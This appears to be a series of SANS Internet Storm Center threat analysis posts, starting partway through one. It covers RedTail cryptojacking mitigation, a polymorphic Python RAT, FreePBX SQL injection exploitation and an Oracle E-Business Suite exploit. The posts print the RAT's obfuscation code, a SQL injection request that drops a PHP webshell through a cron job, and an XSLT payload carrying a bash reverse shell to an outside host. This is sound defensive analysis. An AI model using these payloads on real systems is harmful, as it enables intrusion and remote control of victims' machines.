• Script-based setup: After gaining access, they uploaded and executed setup.sh to configure the miner. They also ran clean.sh to remove competing cryptomining processes, ensuring RedTail had exclusive use of system resources.
• Persistence through SSH keys: Attackers implanted their own SSH keys into ~/.ssh/authorized_keys, allowing them to return without repeating brute-force attempts.
• Defense evasion: Logs recorded file deletion commands, which indicated that attackers tried to cover their tracks after installation.

These observations show that RedTail campaigns extend beyond simple cryptomining. Attackers maintain persistence, remove competition, and conceal their activity — behaviors that defenders should use when building detection and response strategies.

Mitigation

Defending against RedTail and similar cryptojacking malware requires a two-stage approach: prevention and detection/response.

1. Prevention (First Line of Defense)
   • Hardening Access
     • Use SSH key authentication and disable password logins.
     • Rate-limit SSH login attempts; enforce lockouts on repeated failures (fail2ban).
     • Disable root logins (PermitRootLogin no) and unnecessary services.
   • Patching and Updates
     • Apply security updates.
   • Network Controls
     • Restrict unnecessary inbound access.
     • Segment honeypots and exposed systems from production assets.
     • Block or sinkhole known mining pool connections.
        
2. Detection & Response (Catching What Slips Through)
   • Visibility
     • Enable detailed SSH, process, and outbound network logging.
     • Monitor CPU, memory, and disk I/O for abnormal sustained spikes.
   • TTP-Based Detection
     • Watch for brute-force attempts and repeated failed logins.
     • Flag unauthorized entries in ~/.ssh/authorized_keys.
     • Detect creation of unusual systemd services.
     • Monitor encrypted outbound traffic to unknown/private pools.
   • Response Actions
     • Isolate compromised hosts immediately.
     • Remove attacker SSH keys and terminate mining processes.
     • Rebuild compromised systems from clean images.
   • Continuous Monitoring
     • Track for reinfection attempts.
     • Use honeypots (like DShield) to capture new TTPs and feed them into defenses.

Conclusion

The only way to detect threats is to look for them, and detection has little value without response. Protecting devices and networks remains challenging but achievable with layered defenses. As the world grows more connected and attackers getting craftier, defenders must improve too.

[1] https://www.sans.edu/cyber-security-programs/bachelors-degree/
[2] https://www.checkpoint.com/cyber-hub/threat-prevention/ransomware/
[3] https://www.malwarebytes.com/cryptojacking
[4] https://www.akamai.com/blog/security-research/2024-redtail-cryptominer-pan-os-cve-exploit
[5] https://www.forescout.com/blog/new-redtail-malware-exploited-via-php-security-vulnerability/
[6] https://isc.sans.edu/diary/30950
[7] https://www.virustotal.com/gui/file/89782d8142297907c9962eebdae29c28df86805a99f38a683ab55c8fa1596dd8/behavior

 

--
Jesse La Grew
Handler

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Today, I spoted on VirusTotal an interesting Python RAT. They are tons of them but this one attracted my attention based on some function names present in the code: self_modifying_wrapper(), decrypt_and_execute() and polymorph_code(). A polymorphic malware is a type of malware that has been developed to repeatedly mutate its appearance or signature files at every execution time. The file got a very low score of 2/64 on VT! (SHA256:7173e20e7ec217f6a1591f1fc9be6d0a4496d78615cc5ccdf7b9a3a37e3ecc3c).

To be able to modify its code on the fly, the program must have access to its own source code. Many languages have this capability. I covered the same technque in JavaScript a long time ago[1]. With Python, there is a very interesting module that can add the same capability: inspect[2].

Here is a simple snippet of code to demonstrate how it works:

remnux@remnux:~$ cat poc.py
import inspect

def dummy_function():
    print("I'm a dummy function!")

def main():
    print("Function code:")
    print(inspect.getsource(dummy_function))

if __name__ == "__main__":
    main()

remnux@remnux:~$ python3 poc.py
Function code:
def dummy_function():
    print("I'm a dummy function!")

Once you get the source code, you can perform plenty of actions like anti-tampering detection (was the code modified - to debug it) or obfuscate it.

In the discovered sample, the self_modifying_wrapper() function will grab a function code, XOR it with a random key then un-XOR it and execute it from memory:

# Self-modifying code wrapper (simulates packing)
def self_modifying_wrapper():
    """Wrap critical code in a self-modifying layer."""
    log_path = resource_path('debug.log')
    try:
        # Simulate packed code by XORing critical sections
        critical_code = inspect.getsource(main).encode()
        xor_key = random.randint(1, 255)
        packed_code = bytes(b ^ xor_key for b in critical_code)
        # Unpack at runtime
        unpacked_code = bytes(b ^ xor_key for b in packed_code)
        code_obj = marshal.loads(zlib.decompress(unpacked_code))
        exec(code_obj)
        with open(log_path, "a") as f:
            f.write("[+] Self-modifying code executed\n")
        return True
    except Exception as e:
        with open(log_path, "a") as f:
            f.write(f"[-] Self-modifying code failed: {e}\n")
        return False

The malware has also the capability to inject junk code:

def polymorph_code(code):
    """Obfuscate code with advanced randomization and junk code."""
    log_path = resource_path('debug.log')
    try:
        # Advanced variable renaming
        var_map = {var: ''.join(random.choice(string.ascii_letters + string.digits) for _ in range(random.randint(8, 12))) for var in code.split() if var.isidentifier()}
        for old_var, new_var in var_map.items():
            code = code.replace(old_var, new_var)
        # Insert complex junk code
        junk_snippets = [
            "def _unused_{}(): return None\n".format(''.join(random.choice(string.ascii_letters) for _ in range(8))),
            "x = [0] * {}; x = [y for y in x]\n".format(random.randint(10, 100)),
            "import time; time.sleep({})\n".format(random.uniform(0.01, 0.1)),
            "try: pass\nexcept: pass\n"
        ]
        lines = code.split('\n')
        for _ in range(random.randint(10, 20)):
            lines.insert(random.randint(0, len(lines)), random.choice(junk_snippets))
        code = '\n'.join(lines)
        # Shuffle function order
        code = code.replace('\r\n', '\n')  # Normalize line endings
        functions = re.findall(r'(def .+?\n\s*return .+?\n)', code, re.DOTALL)
        if functions:
            random.shuffle(functions)
            code = code.replace(''.join(functions), ''.join(functions))
        with open(log_path, "a") as f:
            f.write("[+] Advanced polymorphic transformation applied\n")
        return code
    except Exception as e:
        with open(log_path, "a") as f:
            f.write(f"[-] Polymorphic transformation failed: {e}\n")
        return code
        
It's easy to get a nice overview of the RAT capabilities:

Besides this specificity, the malware is a classic one and offers plenty of features to the Attacker. Here is a list of interesting functions that give a good overview of the capabilities:

remnux@remnux:~$ grep "async def" 7173e20e7ec217f6a1591f1fc9be6d0a4496d78615cc5ccdf7b9a3a37e3ecc3c
async def socket_network_scan():
async def scan_host(ip):
async def try_router_hack(ip):
async def test_default_credentials(ip, service, port):
async def deliver_payload(ip, share=None, service=None, port=None):
async def execute_payload(ip, target_path, service):
async def get_phone_number(stolen_data):
async def send_stolen_data(stolen_data, channel, logins_path):
async def spread_to_network():
async def report_spreading_status(ip, message):
async def xworm(ctx, spread_url="https://example.com/serial_spoofer.exe"):
async def record_screen_webcam(voice_channel, ctx):
async def on_ready():
async def commands(ctx):
async def encrypt(ctx):
async def mine(ctx):
async def screenshot(ctx):
async def audio(ctx):
async def listen(ctx):
async def execute(ctx, *, command):
async def upload(ctx):
async def download(ctx, *, filename):
async def xworm(ctx):
async def archive(ctx):
async def system_info(ctx):
async def run(ctx, *, program):

In the same way, here is the list of bot commands:

# Bot command: Show available commands
@bot.command()
async def commands(ctx):
    log_path = resource_path('debug.log')
    with open(log_path, "a") as f:
        f.write("[+] Sending command list\n")
    commands_list = """
    /commands - Show this help message
    /encrypt - Encrypt victim's files
    /mine - Start cryptominer (simulated)
    /screenshot - Capture screenshot
    /audio - Capture audio
    /listen - Record screen for 30 seconds, stream high-quality live audio to voice channel
    /execute <command> - Run shell command
    /upload - Upload attached file to victim's PC
    /download <filename> - Search and send file from victim's PC
    /xworm - Deploy Xworm payload
    /archive - Archive critical files
    /keylog_start - Start keylogger
    /keylog_stop - Stop keylogger and send log
    /system_info - Get system information
    /run <program> - Run a program
    """
    await ctx.send(commands_list)

The file was uploaded on VT as "nirorat.py". I did not find any reference to this RAT. If you have more details, let us know!

[1] https://isc.sans.edu/diary/AntiDebugging+JavaScript+Techniques/26228
[2] https://docs.python.org/3/library/inspect.html
 

Xavier Mertens (@xme)
Xameco
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

FreePBX is a popular PBX system built around the open source VoIP system Asterisk. To manage Asterisk more easily, it provides a capable web-based admin interface. Sadly, like so many web applications, it has had its share of vulnerabilities in the past. Most recently, a SQL injection vulnerability was found that allows attackers to modify the database.

For a PBX, there are a number of obvious attacks. For example, they are often abused for free phone calls, to impersonate the companies running the PBX, or to hide the true origin of phone calls. Manipulating the FreePBX database would certainly facilitate these types of attacks. However, I noticed some slightly more interesting attacks recently attempting to achieve complete code execution.

A typical request looks like:

GET /admin/ajax.php?module=FreePBX\modules\endpoint\ajax&command=model&template=x&model=model&brand=x' ;INSERT INTO cron_jobs (modulename,jobname,command,class,schedule,max_runtime,enabled,execution_order) VALUES ('sysadmin','takdak','echo "PD9waHAgaGVhZGVyKCd4X3BvYzogQ1ZFLTIwMjUtNTc4MTknKTsgZWNobyBzaGVsbF9leGVjKCd1bmFtZSAtYScpOyB1bmxpbmsoX19GSUxFX18pOyA/Pgo="|base64 -d >/var/www/html/rspgf.php',NULL,'* * * * *',30,1,1) --

The "brand" parameter is used for the SQL injection, and the parameter decodes to:

 ;INSERT INTO cron_jobs (modulename,jobname,command,class,schedule,max_runtime,enabled,execution_order) VALUES ('sysadmin','takdak','echo "PD9waHAgaGVhZGVyKCd4X3BvYzogQ1ZFLTIwMjUtNTc4MTknKTsgZWNobyBzaGVsbF9leGVjKCd1bmFtZSAtYScpOyB1bmxpbmsoX19GSUxFX18pOyA/Pgo="|base64 -d >/var/www/html/rspgf.php',NULL,'* * * * *',30,1,1) --

FreePBX uses the "cron_jobs" database to assist in the management of cron jobs. Inserting a line into the table results in simple, arbitrary code execution. The command injected creates a file /var/www/html/rspgf.php, with the following content:

<?php header('x_poc: CVE-2025-57819'); echo shell_exec('uname -a'); unlink(__FILE__); ?>

So, a simple test to see if the system is vulnerable. Interestingly, the file deletes itself after being accessed by the attacker. The cron job should persist and re-create the file every minute, which makes the "unlink" kind of pointless. I do not see any hits in our honeypot for this file. Reviewing the cron_jobs table should be another good way to find similar exploits.

Please make sure your FreePBX instance is up to date. The vulnerability was initially made public on August 28th [1], and was already exploited at the time.

[1] https://community.freepbx.org/t/security-advisory-please-lock-down-your-administrator-access/107203

 

--
Johannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu
Twitter|

 

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

[Update: I added the server part delivering the payload]

This weekend, Oracle published a surprise security bulletin announcing an exploited vulnerability in Oracle E-Business Suite. As part of the announcement, which also included a patch, Oracle published IoC observed as part of the incident response [1].

One script I found interesting is what Oracle calls "exp.py" [2]. Here is a quick analysis of the HTTP requests sent by the script. I only ran it against a simple Python web server, not an actual Oracle E-Business Suite install.

The script takes two parameters: The URL of the target and the IP/port of a config server.

The first request sent by the script:

GET /OA_HTML/runforms.jsp HTTP/HTTP/1.1
Host: [target host]:8000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

The script starts by assuming that the internal host is the same as the target host. If this request results in a redirect, the new internal host will be extracted from the Location header.

POST /OA_HTML/JavaScriptServlet HTTP/HTTP/1.1
Host: [target host]:8000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
CSRF-XHR: YES
FETCH-CSRF-TOKEN: 1
Content-Length: 0

This request will return a CSRF token that is extracted from the body of the response.

Finally, the actual exploit request is created:

POST /OA_HTML/configurator/UiServlet HTTP/HTTP/1.1
Host: localhost:8000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
CSRF-XHR: YES
FETCH-CSRF-TOKEN: 1
Content-Length: 4324
Content-Type: application/x-www-form-urlencoded

These are the headers of the request, which are not very remarkable. The body is a bit more interesting. After URL and HTML entity decoding, the body turns out to be:

redirectFromJsp=1
getUiType=<?xml+version="1.0"+encoding="UTF-8"?>
<initialize>
++++<param+name="init_was_saved">test</param>
++++<param+name="return_url">
http://target:7201/OA_HTML/help/../ieshostedsurvey.jsp HTTP/1.2
Host: evilhost:80
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Connection: keep-alive
Cookie:

POST /

++++<param+name="ui_def_id">0</param>
++++<param+name="config_effective_usage_id">0</param>
++++<param+name="ui_type">Applet</param>
</initialize>

Interesting is the use of the invalid HTTP version 1.2, which may be used to bypass some filters. The stray "POST /" at the end is labeled as "keep alive", and may just be a partial request to keep the connection open a bit longer.

Port 7201 is the default non-TLS port for the application server. The URL looks like a path traversal exploit. Given that this is the payload of the last request, the vulnerability is likely best described as a server-side request forgery issue (and it is labeled as such in the script). 

In short, the exploit does:

• Verify the hostname name
• Retrieve a CSRF token
• sends a request to the app server to use SSRF to connect to an "evilhost" and retrieve instructions? Maybe more about this later. From a detection point of view. The HTTP version 1.2 looks promising.

The "evilhost" the script connects to is implemented with a simple Python script, server.py, implementing two paths [3]:

GET /OA_HTML/help/../ieshostedsurvey.xsl
POST /OA_HTML/help/../ibeCRgpIndividualUser.jsp

Both return the same XSLT style sheet:

<xsl:stylesheet version="1.0"
                    xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
                    xmlns:b64="http://www.oracle.com/XSL/Transform/java/sun.misc.BASE64Decoder"
                    xmlns:jsm="http://www.oracle.com/XSL/Transform/java/javax.script.ScriptEngineManager"
                    xmlns:eng="http://www.oracle.com/XSL/Transform/java/javax.script.ScriptEngine"
                    xmlns:str="http://www.oracle.com/XSL/Transform/java/java.lang.String">
        <xsl:template match="/">
            <xsl:variable name="bs" select="b64:decodeBuffer(b64:new(),'CiAgICB2YXIgc3RyaW5nYyA9IGphdmEubGFuZy5DbGFzcy5mb3JOYW1lKCdqYXZhLmxhbmcuU3RyaW5nJyk7CiAgICB2YXIgY21kcyA9ICBqYXZhLmxhbmcucmVmbGVjdC5BcnJheS5uZXdJbnN0YW5jZShzdHJpbmdjLDMpOwogICAgamF2YS5sYW5nLnJlZmxlY3QuQXJyYXkuc2V0KGNtZHMsMCwnc2gnKTsKICAgIGphdmEubGFuZy5yZWZsZWN0LkFycmF5LnNldChjbWRzLDEsJy1jJyk7CiAgICBqYXZhLmxhbmcucmVmbGVjdC5BcnJheS5zZXQoY21kcywyLCdiYXNoIC1pID4mIC9kZXYvdGNwLzguOC44LjgvNDQ0NCAwPiYxJyk7CiAgICBqYXZhLmxhbmcuUnVudGltZS5nZXRSdW50aW1lKCkuZXhlYyhjbWRzKTsKICAgIDEKICAgICAgICA=')"/>
            <xsl:variable name="js" select="str:new($bs)"/>
            <xsl:variable name="m" select="jsm:new()"/>
            <xsl:variable name="e" select="jsm:getEngineByName($m, 'js')"/>
            <xsl:variable name="code" select="eng:eval($e, $js)"/>
            <xsl:value-of select="$code"/>
        </xsl:template>
    </xsl:stylesheet>

 

The Base64 encoded part includes the user configurable command to execute:

    var stringc = java.lang.Class.forName('java.lang.String');
    var cmds =  java.lang.reflect.Array.newInstance(stringc,3);
    java.lang.reflect.Array.set(cmds,0,'sh');
    java.lang.reflect.Array.set(cmds,1,'-c');
    java.lang.reflect.Array.set(cmds,2,'bash -i >& /dev/tcp/8.8.8.8/4444 0>&1');
    java.lang.Runtime.getRuntime().exec(cmds);
    1

 

For the Windows version of the exploit, cmd /c is used instead of sh -c.

Note that the request referenced in exp.py requests "/OA_HTML/help/../ieshostedsurvey.jsp", not the .xsl stylesheet. I can only guess at this point that there may be a request triggered to translate the .jsp file, which may be related to the SSRF issue. Maybe someone else has a better idea, or more insight into how the app server works.

[1] https://www.oracle.com/security-alerts/alert-cve-2025-61882.html
[2] https://www.virustotal.com/gui/file/aa0d3859d6633b62bccfb69017d33a8979a3be1f3f0a5a4bf6960d6c73d41121
[3] https://www.virustotal.com/gui/file/6fd538e4a8e3493dda6f9fcdc96e814bdd14f3e2ef8aa46f0143bff34b882c1b/community

--
Johannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu
Twitter|

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.